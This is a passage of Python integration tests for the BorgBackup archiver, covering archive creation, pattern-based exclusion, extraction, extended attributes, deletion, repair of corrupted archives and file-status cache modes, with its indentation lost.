def _create_test_caches(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('cache1/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('cache2/%s' % CACHE_TAG_NAME,
contents=b'invalid signature')
os.mkdir('input/cache3')
os.link('input/cache1/%s' % CACHE_TAG_NAME, 'input/cache3/%s' % CACHE_TAG_NAME)
def test_create_stdin(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
input_data = b'\x00foo\n\nbar\n \n'
self.cmd('create', self.repository_location + '::test', '-', input=input_data)
item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
assert item['uid'] == 0
assert item['gid'] == 0
assert item['size'] == len(input_data)
assert item['path'] == 'stdin'
extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test', binary_output=True)
assert extracted_data == input_data
def test_create_without_root(self):
"""test create without a root"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', exit_code=2)
def test_create_pattern_root(self):
"""test create with only a root pattern"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
output = self.cmd('create', '-v', '--list', '--pattern=R input', self.repository_location + '::test')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
def test_create_pattern(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
def test_create_pattern_file(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('otherfile', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=-input/otherfile', '--patterns-from=' + self.patterns_file_path,
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
self.assert_in('x input/otherfile', output)
def test_create_pattern_exclude_folder_but_recurse(self):
"""test when patterns exclude a parent folder, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_in('x input/x/a/foo_a', output)
self.assert_in("A input/x/b/foo_b", output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_exclude_folder_no_recurse(self):
"""test when patterns exclude a parent folder and, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n! input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_not_in('input/x/a/foo_a', output)
self.assert_not_in('input/x/a', output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_intermediate_folders_first(self):
"""test that intermediate folders appear first when patterns exclude a parent folder but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/a\n+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', '.')
# list the archive and verify that the "intermediate" folders appear before
# their contents
out = self.cmd('list', '--format', '{type} {path}{NL}', self.repository_location + '::test')
out_list = out.splitlines()
self.assert_in('d x/a', out_list)
self.assert_in('d x/b', out_list)
assert out_list.index('d x/a') < out_list.index('- x/a/foo_a')
assert out_list.index('d x/b') < out_list.index('- x/b/foo_b')
def test_create_no_cache_sync(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
create_json = json.loads(self.cmd('create', '--no-cache-sync', self.repository_location + '::test', 'input',
'--json', '--error')) # ignore experimental warning
info_json = json.loads(self.cmd('info', self.repository_location + '::test', '--json'))
create_stats = create_json['cache']['stats']
info_stats = info_json['cache']['stats']
assert create_stats == info_stats
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('create', '--no-cache-sync', self.repository_location + '::test2', 'input')
self.cmd('info', self.repository_location)
self.cmd('check', self.repository_location)
def test_extract_pattern_opt(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file_important'])
def _assert_test_caches(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['cache2', 'file1'])
self.assert_equal(sorted(os.listdir('output/input/cache2')), [CACHE_TAG_NAME])
def test_exclude_caches(self):
self._create_test_caches()
self.cmd('create', '--exclude-caches', self.repository_location + '::test', 'input')
self._assert_test_caches()
def test_recreate_exclude_caches(self):
self._create_test_caches()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-caches', self.repository_location + '::test')
self._assert_test_caches()
def _create_test_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('tagged1/.NOBACKUP')
self.create_regular_file('tagged2/00-NOBACKUP')
self.create_regular_file('tagged3/.NOBACKUP/file2', size=1024)
def _assert_test_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
def test_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP', self.repository_location + '::test', 'input')
self._assert_test_tagged()
def test_recreate_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP',
self.repository_location + '::test')
self._assert_test_tagged()
def _create_test_keep_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file0', size=1024)
self.create_regular_file('tagged1/.NOBACKUP1')
self.create_regular_file('tagged1/file1', size=1024)
self.create_regular_file('tagged2/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('tagged2/file2', size=1024)
self.create_regular_file('tagged3/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('tagged3/file3', size=1024)
self.create_regular_file('taggedall/.NOBACKUP1')
self.create_regular_file('taggedall/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('taggedall/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('taggedall/file4', size=1024)
def _assert_test_keep_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file0', 'tagged1', 'tagged2', 'tagged3', 'taggedall'])
self.assert_equal(os.listdir('output/input/tagged1'), ['.NOBACKUP1'])
self.assert_equal(os.listdir('output/input/tagged2'), ['.NOBACKUP2'])
self.assert_equal(os.listdir('output/input/tagged3'), [CACHE_TAG_NAME])
self.assert_equal(sorted(os.listdir('output/input/taggedall')),
['.NOBACKUP1', '.NOBACKUP2', CACHE_TAG_NAME, ])
def test_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test', 'input')
self._assert_test_keep_tagged()
def test_recreate_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
self._assert_test_keep_tagged()
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='Linux capabilities test, requires fakeroot >= 1.20.2')
def test_extract_capabilities(self):
fchown = os.fchown
# We need to manually patch chown to get the behaviour Linux has, since fakeroot does not
# accurately model the interaction of chown(2) and Linux capabilities, i.e. it does not remove them.
def patched_fchown(fd, uid, gid):
xattr.setxattr(fd, b'security.capability', b'', follow_symlinks=False)
fchown(fd, uid, gid)
# The capability descriptor used here is valid and taken from a /usr/bin/ping
capabilities = b'\x01\x00\x00\x02\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'security.capability', capabilities)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
with patch.object(os, 'fchown', patched_fchown):
self.cmd('extract', self.repository_location + '::test')
assert xattr.getxattr(b'input/file', b'security.capability') == capabilities
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='xattr not supported on this system or on this version of'
'fakeroot')
def test_extract_xattrs_errors(self):
def patched_setxattr_E2BIG(*args, **kwargs):
raise OSError(errno.E2BIG, 'E2BIG')
def patched_setxattr_ENOTSUP(*args, **kwargs):
raise OSError(errno.ENOTSUP, 'ENOTSUP')
def patched_setxattr_EACCES(*args, **kwargs):
raise OSError(errno.EACCES, 'EACCES')
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'user.attribute', b'value')
self.cmd('init', self.repository_location, '-e' 'none')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
input_abspath = os.path.abspath('input/file')
with patch.object(xattr, 'setxattr', patched_setxattr_E2BIG):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Value or key of extended attribute user.attribute is too big for this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_ENOTSUP):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Extended attributes are not supported on this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_EACCES):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert '>: Permission denied when setting extended attribute user.attribute\n' in out
assert os.path.isfile(input_abspath)
def test_path_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir1/dir2/file', size=1024 * 80)
with changedir('input/dir1/dir2'):
self.cmd('create', self.repository_location + '::test', '../../../input/dir1/../dir1/dir2/..')
output = self.cmd('list', self.repository_location + '::test')
self.assert_not_in('..', output)
self.assert_in(' input/dir1/dir2/file', output)
def test_exclude_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--exclude=file1', self.repository_location + '::test1', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test1')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
with changedir('input'):
self.cmd('create', '--exclude=./file1', self.repository_location + '::test2', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
self.cmd('create', '--exclude=input/./file1', self.repository_location + '::test3', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test3')
self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
def test_repeated_files(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input')
def test_overwrite(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Overwriting regular files and directories should be supported
os.mkdir('output/input')
os.mkdir('output/input/file1')
os.mkdir('output/input/dir2')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
# But non-empty dirs should fail
os.unlink('output/input/file1')
os.mkdir('output/input/file1')
os.mkdir('output/input/file1/dir')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', exit_code=1)
def test_rename(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test', 'test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test.2', 'test.4')
self.cmd('extract', '--dry-run', self.repository_location + '::test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.4')
# Make sure both archives have been renamed
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 2)
self.assert_in('test.3', manifest.archives)
self.assert_in('test.4', manifest.archives)
def test_info(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = self.cmd('info', self.repository_location)
assert 'All archives:' in info_repo
info_archive = self.cmd('info', self.repository_location + '::test')
assert 'Archive name: test\n' in info_archive
info_archive = self.cmd('info', '--first', '1', self.repository_location)
assert 'Archive name: test\n' in info_archive
def test_info_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = json.loads(self.cmd('info', '--json', self.repository_location))
repository = info_repo['repository']
assert len(repository['id']) == 64
assert 'last_modified' in repository
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert info_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in info_repo['encryption']
cache = info_repo['cache']
stats = cache['stats']
assert all(isinstance(o, int) for o in stats.values())
assert all(key in stats for key in ('total_chunks', 'total_csize', 'total_size', 'total_unique_chunks', 'unique_csize', 'unique_size'))
info_archive = json.loads(self.cmd('info', '--json', self.repository_location + '::test'))
assert info_repo['repository'] == info_archive['repository']
assert info_repo['cache'] == info_archive['cache']
archives = info_archive['archives']
assert len(archives) == 1
archive = archives[0]
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
assert datetime.strptime(archive['start'], ISO_FORMAT)
assert datetime.strptime(archive['end'], ISO_FORMAT)
def test_comment(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', '--comment', 'this is the comment', self.repository_location + '::test2', 'input')
self.cmd('create', '--comment', '"deleted" comment', self.repository_location + '::test3', 'input')
self.cmd('create', '--comment', 'preserved comment', self.repository_location + '::test4', 'input')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: this is the comment' in self.cmd('info', self.repository_location + '::test2')
self.cmd('recreate', self.repository_location + '::test1', '--comment', 'added comment')
self.cmd('recreate', self.repository_location + '::test2', '--comment', 'modified comment')
self.cmd('recreate', self.repository_location + '::test3', '--comment', '')
self.cmd('recreate', self.repository_location + '::test4', '12345')
assert 'Comment: added comment' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: modified comment' in self.cmd('info', self.repository_location + '::test2')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test3')
assert 'Comment: preserved comment' in self.cmd('info', self.repository_location + '::test4')
def test_delete(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('create', self.repository_location + '::test.3', 'input')
self.cmd('create', self.repository_location + '::another_test.1', 'input')
self.cmd('create', self.repository_location + '::another_test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('delete', '--prefix', 'another_', self.repository_location)
self.cmd('delete', '--last', '1', self.repository_location)
self.cmd('delete', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
output = self.cmd('delete', '--stats', self.repository_location + '::test.2')
self.assert_in('Deleted data:', output)
# Make sure all data except the manifest has been deleted
with Repository(self.repository_path) as repository:
self.assert_equal(len(repository), 1)
def test_delete_multiple(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('create', self.repository_location + '::test3', 'input')
self.cmd('delete', self.repository_location + '::test1', 'test2')
self.cmd('extract', '--dry-run', self.repository_location + '::test3')
self.cmd('delete', self.repository_location, 'test3')
assert not self.cmd('list', self.repository_location)
def test_delete_repo(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'no'
self.cmd('delete', self.repository_location, exit_code=2)
assert os.path.exists(self.repository_path)
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
self.cmd('delete', self.repository_location)
# Make sure the repo is gone
self.assertFalse(os.path.exists(self.repository_path))
def test_delete_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
for item in archive.iter_items():
if 'chunks' in item:
first_chunk_id = item.chunks[0].id
repository.delete(first_chunk_id)
repository.commit(compact=False)
break
output = self.cmd('delete', '--force', self.repository_location + '::test')
self.assert_in('deleted archive was corrupted', output)
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_delete_double_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
id = archive.metadata.items[0]
repository.put(id, b'corrupted items metadata stream chunk')
repository.commit(compact=False)
self.cmd('delete', '--force', '--force', self.repository_location + '::test')
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_corrupted_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
output = self.cmd('check', '--show-version', self.repository_location)
self.assert_in('borgbackup version', output) # implied output even without --info given
self.assert_not_in('Starting repository check', output) # --info not given for root logger
name = sorted(os.listdir(os.path.join(self.tmpdir, 'repository', 'data', '0')), reverse=True)[1]
with open(os.path.join(self.tmpdir, 'repository', 'data', '0', name), 'r+b') as fd:
fd.seek(100)
fd.write(b'XXXX')
output = self.cmd('check', '--info', self.repository_location, exit_code=1)
self.assert_in('Starting repository check', output) # --info given for root logger
# we currently need to be able to create a lock directory inside the repo:
@pytest.mark.xfail(reason="we need to be able to create the lock directory inside the repo")
def test_readonly_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
os.system('chmod -R ugo-w ' + self.repository_path)
try:
self.cmd('extract', '--dry-run', self.repository_location + '::test')
finally:
# Restore permissions so shutil.rmtree is able to delete it
os.system('chmod -R u+w ' + self.repository_path)
@pytest.mark.skipif('BORG_TESTS_IGNORE_MODES' in os.environ, reason='modes unreliable')
def test_umask(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
mode = os.stat(self.repository_path).st_mode
self.assertEqual(stat.S_IMODE(mode), 0o700)
def test_create_dry_run(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--dry-run', self.repository_location + '::test', 'input')
# Make sure no archive has been created
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 0)
def add_unknown_feature(self, operation):
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
manifest.config[b'feature_flags'] = {operation.value.encode(): {b'mandatory': [b'unknown-feature']}}
manifest.write()
repository.commit(compact=False)
def cmd_raises_unknown_feature(self, args):
if self.FORK_DEFAULT:
self.cmd(*args, exit_code=EXIT_ERROR)
else:
with pytest.raises(MandatoryFeatureUnsupported) as excinfo:
self.cmd(*args)
assert excinfo.value.args == (['unknown-feature'],)
def test_unknown_feature_on_create(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.WRITE)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_cache_sync(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
self.add_unknown_feature(Manifest.Operation.READ)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_change_passphrase(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['key', 'change-passphrase', self.repository_location])
def test_unknown_feature_on_read(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
with changedir('output'):
self.cmd_raises_unknown_feature(['extract', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['list', self.repository_location])
self.cmd_raises_unknown_feature(['info', self.repository_location + '::test'])
def test_unknown_feature_on_rename(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['rename', self.repository_location + '::test', 'other'])
def test_unknown_feature_on_delete(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.DELETE)
# delete of an archive raises
self.cmd_raises_unknown_feature(['delete', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['prune', '--keep-daily=3', self.repository_location])
# delete of the whole repository ignores features
self.cmd('delete', self.repository_location)
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_unknown_feature_on_mount(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
os.mkdir(mountpoint)
# XXX this might hang if it doesn't raise an error
self.cmd_raises_unknown_feature(['mount', self.repository_location + '::test', mountpoint])
@pytest.mark.allow_cache_wipe
def test_unknown_mandatory_feature_in_cache(self):
if self.prefix:
path_prefix = 'ssh://__testsuite__'
else:
path_prefix = ''
print(self.cmd('init', '--encryption=repokey', self.repository_location))
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
cache.begin_txn()
cache.cache_config.mandatory_features = set(['unknown-feature'])
cache.commit()
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test', 'input')
else:
called = False
wipe_cache_safe = LocalCache.wipe_cache
def wipe_wrapper(*args):
nonlocal called
called = True
wipe_cache_safe(*args)
with patch.object(LocalCache, 'wipe_cache', wipe_wrapper):
self.cmd('create', self.repository_location + '::test', 'input')
assert called
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
assert cache.cache_config.mandatory_features == set([])
def test_progress_on(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--progress', self.repository_location + '::test4', 'input')
self.assert_in("\r", output)
def test_progress_off(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', self.repository_location + '::test5', 'input')
self.assert_not_in("\r", output)
def test_file_status(self):
"""test that various file status show expected results
clearly incomplete: only tests for the weird "unchanged" status for now"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
# should find first file as unmodified
output = self.cmd('create', '--list', self.repository_location + '::test1', 'input')
self.assert_in("U input/file1", output)
# this is expected, although surprising, for why, see:
# https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file
self.assert_in("A input/file2", output)
def test_file_status_cs_cache_mode(self):
"""test that a changed file with faked "previous" mtime still gets backed up in ctime,size cache_mode"""
self.create_regular_file('file1', contents=b'123')
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test1', 'input')
# modify file1, but cheat with the mtime (and atime) and also keep same size:
st = os.stat('input/file1')
self.create_regular_file('file1', contents=b'321')
os.utime('input/file1', ns=(st.st_atime_ns, st.st_mtime_ns))
# this mode uses ctime for change detection, so it should find file1 as modified
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test2', 'input')
self.assert_in("M input/file1", output)
def test_file_status_ms_cache_mode(self):
"""test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test1', 'input')
# change mode of file1, no content change:
st = os.stat('input/file1')
os.chmod('input/file1', st.st_mode ^ stat.S_IRWXO) # this triggers a ctime change, but mtime is unchanged
# this mode uses mtime for change detection, so it should find file1 as unmodified
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test2', 'input')
self.assert_in("U input/file1", output)
def test_file_status_rc_cache_mode(self):
"""test that files get rechunked unconditionally in rechunk,ctime cache mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test1', 'input')
# no changes here, but this mode rechunks unconditionally
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test2', 'input')
self.assert_in("A input/file1", output)
def test_file_status_excluded(self):
"""test that excluded paths are listed"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
if has_lchflags:
self.create_regular_file('file3', size=1024 * 80)
platform.set_flags(os.path.join(self.input_path, 'file3'), stat.UF_NODUMP)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
# should find second file as excluded
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test1', 'input', '--exclude', '*/file2')
self.assert_in("U input/file1", output)
self.assert_in("x input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
def test_create_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
create_info = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
# The usual keys
assert 'encryption' in create_info
assert 'repository' in create_info
assert 'cache' in create_info
